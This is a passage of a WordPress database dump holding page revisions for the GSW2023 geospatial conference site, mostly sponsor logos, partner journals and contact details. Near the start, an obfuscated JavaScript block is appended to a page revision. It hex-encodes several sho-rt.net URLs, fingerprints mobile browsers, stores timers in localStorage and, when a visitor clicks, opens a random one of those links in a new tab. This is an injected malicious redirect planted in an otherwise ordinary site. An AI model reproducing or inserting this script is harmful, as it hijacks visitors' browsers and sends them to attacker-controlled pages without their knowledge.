dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:41:39','2023-08-13 03:41:39','',3066,'https://gsw2023.com/?p=5090',0,'revision','',0),
(5091,1,'2023-08-13 03:42:50','2023-08-13 03:42:50','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" 